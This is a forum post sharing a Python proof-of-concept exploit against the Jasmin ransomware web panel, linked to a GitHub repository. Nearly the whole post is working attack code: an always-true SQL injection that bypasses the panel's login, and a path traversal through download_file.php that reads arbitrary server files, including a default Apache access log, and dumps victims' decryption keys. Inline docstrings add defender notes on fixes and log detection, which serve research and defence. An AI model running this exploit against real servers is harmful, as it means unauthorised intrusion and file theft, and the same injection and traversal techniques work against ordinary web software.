Jasmin Ransomware Panel - SQLi + LFI


Jasmin Ransomware Panel - SQLi + LFI

Postby ltx_Lazzarus » Sun May 05, 2024 6:15 am

https://github.com/chebuya/CVE-2024-308 ... versal-poc


import requests
import argparse
import os
from bs4 import BeautifulSoup

def get_file(jasmin_url, filepath):
    """Return the response body of the panel's download_file.php for *filepath*.

    *filepath* goes into the ``file`` query parameter exactly as passed in,
    with no URL-encoding. The request carries no session cookie and does not
    follow redirects, so the text returned is the body of the first response.

    Defender notes: an endpoint that returns file content to a request without
    a session needs an authentication check that stops execution before any
    output, and the ``file`` value should be resolved against an allow-list of
    names inside the intended directory. In web logs, look for
    download_file.php requests whose ``file`` value points outside that
    directory.
    """
    download_url = f'{jasmin_url}/download_file.php?file={filepath}'
    reply = requests.get(download_url, allow_redirects=False)
    return reply.text


def get_keys(jasmin_url):
    """Print what get_file returns for the link in each dashboard table row.

    Posts a login form to checklogin.php whose password field holds an
    always-true SQL condition (the SQL injection named in the page title), then
    requests dashboard.php with whatever cookies that response set.

    Every ``<tr>`` that contains ``<td>`` cells is read as: cell 0 -> hostname,
    cell 1 -> username, cell 7 -> a link whose href segment following the
    first '=' is handed to get_file. The column positions are hard-coded;
    presumably they match the panel's dashboard layout -- confirm against the
    panel source.

    Defender notes: checklogin.php is not shown here, but the login query
    presumably builds its SQL from the raw field; bound parameters on that
    query are the fix. In web logs this flow appears as a POST to
    checklogin.php followed by GETs to dashboard.php and download_file.php.
    """
    form_headers = {
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }

    # The body is sent as a pre-encoded string, so requests passes it through
    # unchanged; the Content-Type header above is what marks it as form data.
    login_body = "username=&password='+or+1%3D1+--+-&service=login"
    login_reply = requests.post(
        f'{jasmin_url}/checklogin.php',
        headers=form_headers,
        data=login_body,
    )

    dashboard = requests.get(
        f'{jasmin_url}/dashboard.php',
        cookies=login_reply.cookies,
    )
    table_rows = BeautifulSoup(dashboard.text, 'html.parser').find_all('tr')

    # The "- 1" assumes exactly one row without <td> cells (a header row).
    print(f"Dumping decryption keys from {len(table_rows)-1} victims")
    for table_row in table_rows:
        cells = table_row.find_all('td')
        if not cells:
            # Rows without <td> cells (e.g. a <th> header row) carry no entry.
            continue

        username = cells[1].get_text()
        hostname = cells[0].get_text()
        filepath = cells[7].find('a')['href'].split("=")[1]

        print(f"Decryption key for {username}@{hostname}: {get_file(jasmin_url, filepath)}")


# Command-line entry point: two subcommands, "getfile" and "getkeys", each
# taking the panel's base URL.
_URL_HELP = "The jasmin ransomware web panel url (//target_server)"

parser = argparse.ArgumentParser(
    description="LFD/SQLi Exploit PoC for Jasmin Ransomware panel",
)
subparser = parser.add_subparsers(dest='subcommand')

file_parser = subparser.add_parser("getfile", help="Read a file off the server")
file_parser.add_argument("-u", "--url", required=True, help=_URL_HELP)
# The default is the Apache access log of a XAMPP install; the original
# author's note gives identifying the panel's operators as the reason.
file_parser.add_argument(
    "-f", "--file",
    default="c:/xampp/apache/logs/access.log",
    help="The file to read on the target server",
)

keys_parser = subparser.add_parser("getkeys", help="Get decryption keys of victims")
keys_parser.add_argument("-u", "--url", required=True, help=_URL_HELP)

args = parser.parse_args()

if args.subcommand is None:
    # No subcommand given: argparse leaves it as None, so show usage.
    parser.print_help()
else:
    # Drop trailing slashes so the f-string URLs do not contain "//".
    target_url = args.url.rstrip("/")

    if args.subcommand == "getkeys":
        get_keys(target_url)
    elif args.subcommand == "getfile":
        # Normalise backslashes and strip a lowercase "c:" drive prefix.
        target_file = args.file.replace("\\", "/").replace("c:", "")
        # NOTE(review): os.path.join discards the "../" prefix whenever
        # target_file starts with "/", which is the case for the default value
        # once "c:" is stripped; the request then carries the rooted path
        # itself. How the server resolves it is not shown here. Detections on
        # download_file.php should therefore not key on "../" alone.
        target_path = os.path.join("../../../../../../../../../", target_file)
        print(get_file(target_url, target_path))
    else:
        parser.print_help()
stopthe4ttack.box
